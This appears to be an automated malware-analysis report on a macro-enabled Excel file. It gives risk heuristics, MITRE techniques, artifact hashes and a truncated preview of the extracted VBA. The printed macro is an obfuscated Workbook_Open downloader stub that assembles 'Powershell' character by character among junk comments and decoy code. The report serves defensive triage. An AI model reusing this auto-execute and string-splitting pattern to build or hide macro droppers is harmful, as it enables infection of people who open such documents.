MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The OOXML file contains a Workbook_Open VBA macro that is triggered automatically when the document is opened. This macro uses CreateObject to execute a PowerShell command, indicated by the string concatenation 'P' + 'o' + 'w' + 'e' + 'r' + 's' + 'h' + 'e' + 'l' + 'l' + '.exe'. The likely intent is to download and execute a second-stage payload from a remote source, making this a typical macro-based downloader.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7534 bytes |
SHA-256: 01413908ec4bde7eb53d0cf0701b692927ee08aca8d54f6fe7cd90adb3f42aad |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
'TcZfHtEUVIBLIEYbwMHIMFdyHeRTFZcosQLuwYvWYZYwToeQosEJeNKnZH
'Copy the defined range
'Set focus on the target bookmark
'Delete the old table and paste new
On Error Resume Next
WdRange.Tables(1).Delete
WdRange.Paste 'paste in the table
'Adjust column widths
'Reinsert the bookmark
wdDoc.Bookmarks.Add "DataTableHere", WdRange
'Memory cleanup
'MsgBox ("iBtctLVJKz caitvaeBt")
'wknSDYcMvBNRWPXCihpLkDRohKVHVXuYdAyoXsvTyAIvsUWhNHnSueiMtbLSdAQokPOCsJERVruOU
'uXttra
Dim IcvMVN, QWbVOU
'vbNfceuTzw
WbSVY = "P"
'ksVEZSSEcMevPdfQDXRdGTQMDefzETwwuARcHLbwLLRonkwztFcNOCp MWFEiGYVVpuTofLUXoeFtOGkAcYFrNsYPsCFNKHfXXNbRZdcryHhiJRYrsdeIyGkSoeXIhhuMYIAbFtBZV
PDvPEPJf = "o"
'wuzLMYOSbG ksVEZSSEcMevPdfQDXRdGTQMDefzETwwuARcHLbwLLRonkwztFcNOCp
HCShoHNWBa = "w"
'TZoHIvfpBUKWCLdMsCYLNoMNvpHwuXFTHJWXDWvQQLByfAzLTwPNALPGoFrzKVWDrRnTPhkzvkUbR DNSRZYaWci
sG = "e"
'TZoHIvfpBUKWCLdMsCYLNoMNvpHwuXFTHJWXDWvQQLByfAzLTwPNALPGoFrzKVWDrRnTPhkzvkUbR DNSRZYaWci
QLrSFXtRUBr = "r"
'yFLakXz WZUHXukMiOzWXcfszHnSZoWdFzdMPEJHFkrUyMWZMHfXrKLRQMXRsLGIcR
WFTsB = "s"
'TcZfHtEUVIBLIEYbwMHIMFdyHeRTFZcosQLuwYvWYZYwToeQosEJeNKnZH WZUHXukMiOzWXcfszHnSZoWdFzdMPEJHFkrUyMWZMHfXrKLRQMXRsLGIcR
cHXpUZQPHXu = "h"
'MWFEiGYVVpuTofLUXoeFtOGkAcYFrNsYPsCFNKHfXXNbRZdcryHhiJRYrsdeIyGkSoeXIhhuMYIAbFtBZV wuzLMYOSbG
GekAiADJFZU = "e"
'wuzLMYOSbG WZUHXukMiOzWXcfszHnSZoWdFzdMPEJHFkrUyMWZMHfXrKLRQMXRsLGIcR
dZYMRtaMIZn = "l"
'yaATursoEkAQPobMrKBwszawGPAPiPrXAZDdRreYrocGHYyQFENNNMfYap DNSRZYaWci
OOra = "l"
'zMCVbPPeFoiRoWFoohdQfynEhaerKBYsapFcCaFUBaMBGdKBYXbYpJpatXOaLAzdrRQesDQuHpreLTYdsItNzahtZEKFuEkbGIhP
'ksVEZSSEcMevPdfQDXRdGTQMDefzETwwuARcHLbwLLRonkwztFcNOCp wuzLMYOSbG
'EhDBXykrKODaJcMyuPXdpbaMoCIDwhMsYwWBHLMswahENcKiJiiIraD AXrrJwb
'TZoHIvfpBUKWCLdMsCYLNoMNvpHwuXFTHJWXDWvQQLByfAzLTwPNALPGoFrzKVWDrRnTPhkzvkUbR DNSRZYaWci
With Selection
.ClearContents
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders(xlEdgeRight).LineStyle = xlNone
.Borders(xlInsideVertical).LineStyle = xlNone
.Borders(xlInsideHorizontal).LineStyle = xlNone
.Interior.ColorIndex = xlNone
End With
With Application.FileSearch
.NewSearch
'Change path to suit
.LookIn = "/Users/lcw/Desktop/excel"
.FileType = msoFileTypeExcelWorkbooks
If .Execute > 0 Then
For lCount = 1 To .FoundFiles.Count
Set wbResults = Workbooks.Open(Filename:=.FoundFiles(lCount), UpdateLinks:=0)
Sheets("US").Select
Rows("1:1").Select
Selection.Delete Shift:=xlUp
wbResults.Close SaveChanges:=True
Next lCount
End If
End With
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Application.EnableEvents = True
'AXrrJwb yFLakXz
' TcZfHtEUVIBLIEYbwMHIMFdyHeRTFZcosQLuwYvWYZYwToeQosEJeNKnZH
'MWFEiGYVVpuTofLUXoeFtOGkAcYFrNsYPsCFNKHfXXNbRZdcryHhiJRYrsdeIyGkSoeXIhhuMYIAbFtBZV VOVcQbzdNvXzXFThnCFvcPpnoBMAfrZnzBGFODRtvIAVtnLEOwsTdUifEHOrrZYyvJaBZotRLiZAnnXZ
' CnikcESC
'sUzZUtYwO
'wFc
'fpL
'VOVcQbzdNvXzXFThnCFvcPpnoBMAfrZnzBGFODRtvIAVtnLEOwsTdUifEHOrrZYyvJaBZotRLiZAnnXZ
Dim caitvaeBt As Long
'MsgBox Prompt:="wuzLMYOSbG?", _
Buttons:=yFLakXz , _
Title:="CnikcESC "
'yaATursoEkAQPobMrKBwszawGPAPiPrXAZDdRreYrocGHYyQFENNNMfYap
' MWFEiGYVVpuTofLUXoeFtOGkAcYFrNsYPsCFNKHfXXNbRZdcryHhiJRYrsdeIyGkSoeXIhhuMYIAbFtBZV
Dim r As Long, x As Long
For x = 2 To r Step 1
If Range("C" & r).Value = Range("C" & r).Offset(-1).Value Then
Range("C" & r).Offset(-1).EntireRow.Delete
End If
r = r - 1
Next x
'PiG
'AXrrJwb yaATursoEkAQPobMrKBwszawGPAPiPrXAZDdRreYrocGHYyQFENNNMfYap
'PiG
'AXrrJwb wuzLMYOSbG
'WZUHXukMiOzWXcfszHnSZoWdFzdMPEJHFkrUyMWZMHfXrKLRQMXRsLGIcR yFLakXz
'MWFEiGYVVpuTofLUXo
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 28672 bytes |
SHA-256: e1a0337092558ac31896e0fb983b03c0fcce842496dfbd9bfa33fb7ec4dbc16e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.